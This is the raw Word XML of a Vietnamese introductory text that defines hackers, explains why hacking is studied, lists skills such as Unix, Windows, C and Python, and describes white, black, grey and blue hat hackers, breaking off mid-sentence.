    <w:p w14:paraId="465B7716" w14:textId="10D6853C" w:rsidR="00805D0B"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w:t>
      </w:r>
      <w:r w:rsidR="00805D0B" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>1.Hacker là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DDD4B6" w14:textId="65B8A227" w:rsidR="00805D0B" w:rsidRPr="00C73388" w:rsidRDefault="00805D0B"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còn được gọi là tin tặc) là người hiểu rõ hoạt động của hệ thống máy tính, mạng máy tính, có thể viết hay chỉnh sửa phần mềm, phần cứng máy tính để làm thay đổi, chỉnh sửa nó với nhiều mục đích tốt xấu khác nhau. Công việc của hacker bao gồm lập trình, quản trị và bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C691E59" w14:textId="77777777" w:rsidR="00645281" w:rsidRPr="00C73388" w:rsidRDefault="00645281" w:rsidP="00805D0B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47BE24C8" w14:textId="673E6768" w:rsidR="00645281" w:rsidRPr="00C73388" w:rsidRDefault="00645281"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là những người thực hiện hack. Họ sử dụng những kiến thức của họ để khai khác lỗi hỏng, điểm yếu. Hacker cũng được phân ra nhiều loại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6011EC3A" w14:textId="77777777" w:rsidR="00645281" w:rsidRPr="00C73388" w:rsidRDefault="00645281" w:rsidP="00805D0B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA0590B" w14:textId="7DE98895" w:rsidR="00645281"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w:t>
      </w:r>
      <w:r w:rsidR="00645281" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>2. . Tại sao lạ</w:t>
      </w:r>
      <w:r w:rsidR="002F4B1A" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>i nghiê</w:t>
      </w:r>
      <w:r w:rsidR="00645281" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>n cứu về hacking và cần kỹ năng gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EA9717" w14:textId="70A137DA" w:rsidR="00CC3DDC"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w:t>
      </w:r>
      <w:r w:rsidR="00CC3DDC" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>2.1. Tại sao phải nghiên cứu về hacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477CF742" w14:textId="184FA24A" w:rsidR="00CC3DDC" w:rsidRPr="00C73388" w:rsidRDefault="00CC3DDC"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6464B6" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Để biết điểm yếu của hệ thống. Nhận ra điểm yếu để kiểm soát chúng là điều cần thiết nhưng điều đó không có nghĩa là điểm yếu luôn gây tổn hại. Tìm ra c</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>ác lỗ hổng từ hệ thống</w:t>
      </w:r>
      <w:r w:rsidR="006464B6" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> giúp ta có thể phòng trừ và sửa chữa chúng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3D51F2" w14:textId="77777777" w:rsidR="00CC3DDC" w:rsidRPr="00C73388" w:rsidRDefault="00CC3DDC" w:rsidP="00805D0B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D2D6B0" w14:textId="46B218DD" w:rsidR="00CC3DDC" w:rsidRPr="00C73388" w:rsidRDefault="00CC3DDC"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Giúp hệ</w:t>
      </w:r>
      <w:r w:rsidR="008E51B6" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> thố</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>ng an toàn hơn</w:t>
      </w:r>
      <w:r w:rsidR="001A2545" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>. Việc đảm bảo tính sẵn sàng và hoạt động đúng đắn của hệ thống máy tính mà không quan tâm đến thông tin được lưu trữ, xử lý bởi chúng. Đảm bảo thông tin tập trung vào lý do đảm bảo rằng thông tin được bảo vệ và vì thế nó là lý do để thực hiện an toàn thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E7FAA6" w14:textId="77777777" w:rsidR="00ED2B9A" w:rsidRPr="00C73388" w:rsidRDefault="00ED2B9A" w:rsidP="00805D0B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49879F40" w14:textId="06CCFD19" w:rsidR="00ED2B9A" w:rsidRPr="00C73388" w:rsidRDefault="00ED2B9A" w:rsidP="00805D0B">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I.2.2. Các kỹ năng </w:t>
      </w:r>
      <w:r w:rsidR="00901C0F" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">căn bản </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>cần thiết để nghiên cứu hacking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F285BBC" w14:textId="6F7952BC" w:rsidR="00ED2B9A" w:rsidRPr="00C73388" w:rsidRDefault="00ED2B9A"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Có kiến thức ở nhiều nền tả</w:t>
      </w:r>
      <w:r w:rsidR="00EE1E34" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>ng (Linux, Unix</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>, Windows..).</w:t>
      </w:r>
      <w:r w:rsidR="008B6EC9" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F9AD46" w14:textId="30196A43" w:rsidR="008B6EC9" w:rsidRPr="00C73388" w:rsidRDefault="008B6EC9" w:rsidP="008B6EC9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:left="1280" w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C88C7BC" w14:textId="01726019"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UNIX là hệ điều hành đa nhiệm và đa người dùng, được thiết kế để mang lại độ tin cậy và bảo mật cho bất kỳ hệ thống nào sử dụng nó. UNIX được phát triển bởi một nhóm nghiên cứu viên tại AT&amp;T Bell Lab. </w:t>
      </w:r>
      <w:r w:rsidR="00ED2B9A" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Nắm rõ kiến thức mạng (network), kĩ thuật máy tính, bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B913275" w14:textId="5BF65D11"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Một số lượng rất rất lớn web server đang chạy các hệ điều hành nhân UNIX. Do đó việc sử dụng thành thạo và hiểu được design củ</w:t>
      </w:r>
      <w:r w:rsidR="008056A0" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>UNIX là một kỹ năng không thể thiếu của lập trình viên nói chung và hacker nói riêng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D26DB5E" w14:textId="27A587CF"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Ngoài tượng đài UNIX, các hệ điều hành Window cũng là một mục tiêu thú vị để tìm hiểu. Có 2 lý do để học window đó là</w:t>
      </w:r>
      <w:r w:rsidR="008056A0" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: các máy tính cá nhân phần lớn đều sử dụng window và hệ điều hành này có rất nhiều lỗ hổng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BBD397" w14:textId="0BBCEC60" w:rsidR="008B6EC9" w:rsidRPr="00C73388" w:rsidRDefault="008B6EC9" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Việc thực hành khai thác lỗ hổng vừa mang lạ</w:t>
      </w:r>
      <w:r w:rsidR="008056A0" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>kỹ năng hacking căn bản, vừ</w:t>
      </w:r>
      <w:r w:rsidR="008056A0" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">a cho </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>biết sự quý giá và tầm quan trọng của việc cập nhật Windows nói riêng và các phần mềm khác nói chung.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BBEF0F" w14:textId="77777777" w:rsidR="008056A0" w:rsidRPr="00C73388" w:rsidRDefault="008056A0" w:rsidP="008056A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:left="1280" w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415FC172" w14:textId="2406D23B" w:rsidR="00ED2B9A" w:rsidRPr="00C73388" w:rsidRDefault="008056A0"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Lập trình C và các ngôn ngữ lập trình khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265418A9" w14:textId="4BC5F7F3" w:rsidR="008056A0" w:rsidRPr="00C73388" w:rsidRDefault="008056A0" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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C là một ngôn ngữ lập trình mạnh mẽ bậc nhất. Thành thạo ngôn ngữ C là rất cần thiết đối với lập trình viên nói chung và hacker nói riêng. C là ngôn ngữ lập trình hướng cấu trúc. Với ngôn ngữ C, các tác vụ được chia thành từng phần nhỏ hơn và các phần nhỏ này được hoàn thành bởi một số đoạn mã.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F90F16A" w14:textId="074FD9AC" w:rsidR="008056A0" w:rsidRPr="00C73388" w:rsidRDefault="008056A0" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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Với Hacker, ngoài C, vẫn cần thêm các công cụ đắc lực khác. Một trong số các công cụ đó là những ngôn ngữ lập trình bậc cao như Java, Perl, và đặc biệt là Python. Học thêm các ngôn ngữ lập trình khác ngoài C giúp ích rất nhiều cho việc khai thác cũng như vá lỗ hổng của các ứng dụng. Nó được biết đến như là ngôn ngữ ổn định, manh mẽ, linh hoạt cùng với độ bảo mật rất cao. Tìm hiểu mô hình bảo mật áp dụng trong Java là cách nhanh nhất giúp nắm được những nền tảng bảo mật áp dụng trong ngôn ngữ lập trình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8F9E2A" w14:textId="5FD20F4E" w:rsidR="008056A0" w:rsidRPr="00C73388" w:rsidRDefault="008056A0" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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Perl là ngôn ngữ lập trình đa dụng khá linh hoạt, một số tính năng của Perl đưjc lấy ý tưởng từ C. Python nổi tiếng với cú pháp ngắn gọn, dễ học. Tuy cú pháp đơn giản nhưng Python có thể làm được nhiều thứ hơn bạn nghĩ: lập trình web, lập trình big data, viết tool automation,…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A06DDE" w14:textId="32A3C726" w:rsidR="008056A0" w:rsidRPr="00C73388" w:rsidRDefault="008056A0" w:rsidP="008056A0">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p>
    <w:p w14:paraId="43B12E63" w14:textId="1E3C6A5D" w:rsidR="00ED2B9A" w:rsidRPr="00C73388" w:rsidRDefault="00ED2B9A"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000D263F" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Khởi động bằng các tutorial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2A7625" w14:textId="44FDA5C0" w:rsidR="00ED2B9A" w:rsidRPr="00C73388" w:rsidRDefault="000D263F" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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Để trở thành Hacker, con đường ngắn nhất là …. bắt tay vào hack. Tuy nhiên “động chạm” vào các hệ thống lớn không phải là chuyện dễ dàng khi có rất nhiều rào cản cả về mặt pháp lý lẫn chuyên môn  đối với newbie. Do đó, con đường tối ưu nhất là “tập hack” theo các kịch bản có sẵn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CCA02C" w14:textId="77777777" w:rsidR="000D263F" w:rsidRPr="00C73388" w:rsidRDefault="000D263F" w:rsidP="000D263F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:left="1280" w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A036A17" w14:textId="5D3CA0DE" w:rsidR="00ED2B9A" w:rsidRPr="00C73388" w:rsidRDefault="00ED2B9A"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 Phân loại hacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DFFE48" w14:textId="3229A7A1" w:rsidR="00056E23" w:rsidRPr="00C73388" w:rsidRDefault="00056E23"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ề cơ bản có 4 loại hacker: hacker m</w:t>
      </w:r>
      <w:r w:rsidR="007613FC" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>ũ trắng, hacker mũ xám, hacker mũ đen, hacker mũ xanh. Nhưng thực tế còn nhiều loại hacker khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B352C50" w14:textId="77777777" w:rsidR="007613FC" w:rsidRPr="00C73388" w:rsidRDefault="007613FC" w:rsidP="00ED2B9A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44714262" w14:textId="40CF3D81" w:rsidR="007613FC"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1 Hacker mũ trắng</w:t>
      </w:r>
      <w:r w:rsidR="005C73A5" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (White Hat)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3531D496" w14:textId="4A6E9E89" w:rsidR="007613FC"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mũ trắng ho thường là những chuyên gia an nunh mạng, hỗ trợ chính phủ và các tổ chức bằng cách thâm nhập hệ thống để kiểm tra dữ liệu có lỗ hổng nào trong hàng rào bảo mật không. Trong nhiều trường hợp họ cũng xoá vius, phần mềm độc hại cũng như chống lại hacker mỹ đen và các tội phạm mạng khác. Về cơ bản họ được xem là các hacker “có đạo đức”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D39B8AE" w14:textId="77777777" w:rsidR="007613FC" w:rsidRPr="00C73388" w:rsidRDefault="007613FC" w:rsidP="00ED2B9A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C4D7DF" w14:textId="2BC0B8EF" w:rsidR="007613FC"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2. Hacker mũ đen</w:t>
      </w:r>
      <w:r w:rsidR="005C73A5" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Back Hat)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4E270A" w14:textId="39941F09" w:rsidR="00ED2B9A" w:rsidRPr="00C73388" w:rsidRDefault="007613FC"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Khác với hacker mũ trắng, hacker mũ đen là những kẻ gây hại tới cộng đồng. Họ thường tìm các lỗ hổng trong máy tính cá nhân</w:t>
      </w:r>
      <w:r w:rsidR="009F4936" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>, các tổ chức ngân hàng, doanh nghiệp… để đánh cắp thông tin, dữ liệu, tài chính nhằm chuộc lợi cho cá nhân hoặc một tổ chức nào đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51188411" w14:textId="77777777" w:rsidR="005C73A5" w:rsidRPr="00C73388" w:rsidRDefault="005C73A5" w:rsidP="00ED2B9A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348F6ACD" w14:textId="21611218" w:rsidR="005C73A5" w:rsidRPr="00C73388" w:rsidRDefault="005C73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3.3. Hacker mũ xám (Grey Hat):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697750BB" w14:textId="4A8FF6EC" w:rsidR="005C73A5" w:rsidRPr="00C73388" w:rsidRDefault="005C73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 xml:space="preserve">Hacker mũ xám nằm giữa hacker mũ đen và hacker mũ trắng. Họ không ăn cấp tiền hay thông tin nhưng họ cũng không giúp ích được cho người khác. </w:t>
      </w:r>
      <w:r w:rsidR="005A61A5" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Một hacker mũ xám có thể khai thác lỗ hổng, nhưng thay vì sử dụng nó cho mục đích cá nhân, họ có thể nói cho hacker mũ trắng hoặc mũ đen biết để khám phá, cũng có khi họ nói với tổ chức liên quan để sửa chữa vấn đề. Những hacker này chiếm một số lượng lớn trong giới hacker, dù cho hacker mũ xám mới là những hacker chiếm được hầu hết sự chú ý của giới truyền thông.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2893D646" w14:textId="77777777" w:rsidR="005A61A5" w:rsidRPr="00C73388" w:rsidRDefault="005A61A5" w:rsidP="00ED2B9A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10009E1E" w14:textId="542A1432" w:rsidR="005A61A5" w:rsidRPr="00C73388" w:rsidRDefault="005A61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I.3.4. Hacker mũ xanh (Blue hat): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D55A01F" w14:textId="7A23A14A" w:rsidR="005A61A5" w:rsidRPr="00C73388" w:rsidRDefault="005A61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Hacker mũ xanh là họ là những chuyên gia lập trình tài năng được các công ty lớn mời về làm việc để chuyên tìm lỗi, khai thác lỗ hổng và sữa chữa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000C7CFD" w14:textId="77777777" w:rsidR="005A61A5" w:rsidRPr="00C73388" w:rsidRDefault="005A61A5" w:rsidP="00ED2B9A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43EF9A9B" w14:textId="1F9217BB" w:rsidR="005A61A5" w:rsidRPr="00C73388" w:rsidRDefault="005A61A5"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Về nguyên tắc nói chùng mọi hacker đều là xấu và hành động của họ</w:t>
      </w:r>
